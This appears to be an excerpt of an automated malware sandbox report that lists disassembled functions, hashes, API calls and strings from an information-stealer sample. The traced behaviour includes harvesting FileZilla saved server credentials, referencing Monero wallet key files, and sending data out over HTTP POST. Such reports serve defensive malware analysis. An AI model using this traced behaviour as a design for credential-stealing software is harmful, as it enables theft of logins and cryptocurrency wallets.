                                Function 01251BD9 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ep=k
                                • API String ID: 0-3385147411
                                • Opcode ID: dc823356938f95aaf46c1a8deb66f40634f36b77dd04c947d78f15d5ac4d1cf7
                                • Instruction ID: 6036c80153d52caf4649eaf2fbfedb2097c1acddb3c2ff5ed139e01b3f8e7624
                                • Opcode Fuzzy Hash: dc823356938f95aaf46c1a8deb66f40634f36b77dd04c947d78f15d5ac4d1cf7
                                • Instruction Fuzzy Hash: 36612AF360C3049FE3046E2DECC577ABBD9EBA4310F19463DE685C3748E93999058692
                                Function 011B279D Relevance: .2, Instructions: 190COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 278546dcdb03eb50b2524ad184c9862b3fbc6cb48845937b9b3dc51bf833be49
                                • Instruction ID: a91f95bf7d166180a83dab7791767ce1f36219c274c912fc596a70540e76e30d
                                • Opcode Fuzzy Hash: 278546dcdb03eb50b2524ad184c9862b3fbc6cb48845937b9b3dc51bf833be49
                                • Instruction Fuzzy Hash: 535128F3E092105BF7486E3DDD5837BBAD6DBD0720F2B823DA689877C8D93908058285
                                Function 01152656 Relevance: .2, Instructions: 172COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 614101a8dcd7a36c6be9c403cd08fed5f996ee7e13d26a665fb81d4f77ce8f1d
                                • Instruction ID: 1fd5adb8e2dee3732e9ea1f608c5f0cd94f92eefcaf03fe7db6c989771431e5d
                                • Opcode Fuzzy Hash: 614101a8dcd7a36c6be9c403cd08fed5f996ee7e13d26a665fb81d4f77ce8f1d
                                • Instruction Fuzzy Hash: 54419BF3B582185BE704A57CEC95762B6CADB94320F19423DEF85D33C0FCB958058285
                                Function 0130AE9C Relevance: .1, Instructions: 88COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ecb8ca2943c4226f9cb9456aadefcca5f45a74f9e365bb1a38ac8de7f6b6c700
                                • Instruction ID: 2fea086547a9ab8a7ab51ba63d61056e890da29538a201af0292e46e935c8d2f
                                • Opcode Fuzzy Hash: ecb8ca2943c4226f9cb9456aadefcca5f45a74f9e365bb1a38ac8de7f6b6c700
                                • Instruction Fuzzy Hash: BE3131B240C7089FE306BF59D88267AFBF4EF58321F06482DD6D082210EB319480DB87
                                Function 00ED9750 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                Function 00ED0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00EE0DBA,00EE0DB7,00EE0DB6,00EE0DB3), ref: 00ED0362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED0369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00ED0385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00ED03CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED03DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00ED0419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00ED0463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00ED0562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00ED0571
                                • lstrcat.KERNEL32(?,url: ), ref: 00ED0580
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED0593
                                • lstrcat.KERNEL32(?,00EE1678), ref: 00ED05A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED05B5
                                • lstrcat.KERNEL32(?,00EE167C), ref: 00ED05C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00ED05D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED05E6
                                • lstrcat.KERNEL32(?,00EE1688), ref: 00ED05F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00ED0604
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED0617
                                • lstrcat.KERNEL32(?,00EE1698), ref: 00ED0626
                                • lstrcat.KERNEL32(?,00EE169C), ref: 00ED0635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 3fa3f28776e782acf33dd230339cd682c26124488803bd0507367580920be696
                                • Instruction ID: 02c061a74510b86d4faac36d3c5463b9f56bcaf694b72e0e8db65149f1fa7bf5
                                • Opcode Fuzzy Hash: 3fa3f28776e782acf33dd230339cd682c26124488803bd0507367580920be696
                                • Instruction Fuzzy Hash: F9D14F76D002089BCB08EBF0DD9AEEE7778EF14300F44552AF512B7185EE74AA46DB61
                                Function 00EC5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EC59F8
                                • StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC5A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC5B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00DAE9F0,00000000,?,00DAA710,00000000,?,00EE1A1C), ref: 00EC5E71
                                • lstrlen.KERNEL32(00000000), ref: 00EC5E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC5E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC5E9A
                                • lstrlen.KERNEL32(00000000), ref: 00EC5EAF
                                • lstrlen.KERNEL32(00000000), ref: 00EC5ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EC5EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00EC5F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EC5F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EC5F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FBD
                                • HttpOpenRequestA.WININET(00000000,00DAE920,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC5BF8
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 2285a4a0b42f267a1d5125d29dfe63d0e28a8d596441608804acdfedcf950d25
                                • Instruction ID: 48da386d90bbd3377daecb5f1cac019c1bad5171700c3700b3a18e4f18446830
                                • Opcode Fuzzy Hash: 2285a4a0b42f267a1d5125d29dfe63d0e28a8d596441608804acdfedcf950d25
                                • Instruction Fuzzy Hash: 11122176820118AACB19EBA0DC95FEE73B8FF54700F4451BAB50672191EF702B8ACF55
                                Function 00ECCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,00DAA5F0,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECCF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00ECD0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ECD0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD208
                                • lstrcat.KERNEL32(?,00EE1478), ref: 00ECD217
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD22A
                                • lstrcat.KERNEL32(?,00EE147C), ref: 00ECD239
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD24C
                                • lstrcat.KERNEL32(?,00EE1480), ref: 00ECD25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD26E
                                • lstrcat.KERNEL32(?,00EE1484), ref: 00ECD27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD290
                                • lstrcat.KERNEL32(?,00EE1488), ref: 00ECD29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD2B2
                                • lstrcat.KERNEL32(?,00EE148C), ref: 00ECD2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD2D4
                                • lstrcat.KERNEL32(?,00EE1490), ref: 00ECD2E3
                                  • Part of subcall function 00EDA820: lstrlen.KERNEL32(00EC4F05,?,?,00EC4F05,00EE0DDE), ref: 00EDA82B
                                  • Part of subcall function 00EDA820: lstrcpy.KERNEL32(00EE0DDE,00000000), ref: 00EDA885
                                • lstrlen.KERNEL32(?), ref: 00ECD32A
                                • lstrlen.KERNEL32(?), ref: 00ECD339
                                  • Part of subcall function 00EDAA70: StrCmpCA.SHLWAPI(00DA8E18,00ECA7A7,?,00ECA7A7,00DA8E18), ref: 00EDAA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECD3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 152e1c01b0f41dfe311ac4bf627620f88737e439dd618e983b22abdfdd9c48c3
                                • Instruction ID: 73e0329fcdd1bedbb1a5f19a93e52eb95ac8aef7eb9efc7d532d90dabe743839
                                • Opcode Fuzzy Hash: 152e1c01b0f41dfe311ac4bf627620f88737e439dd618e983b22abdfdd9c48c3
                                • Instruction Fuzzy Hash: AEE171728102089BCB19EBA0ED96EEE73B8FF14301F04517AF516B3181DE75AB46CB61
                                Function 00ECC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
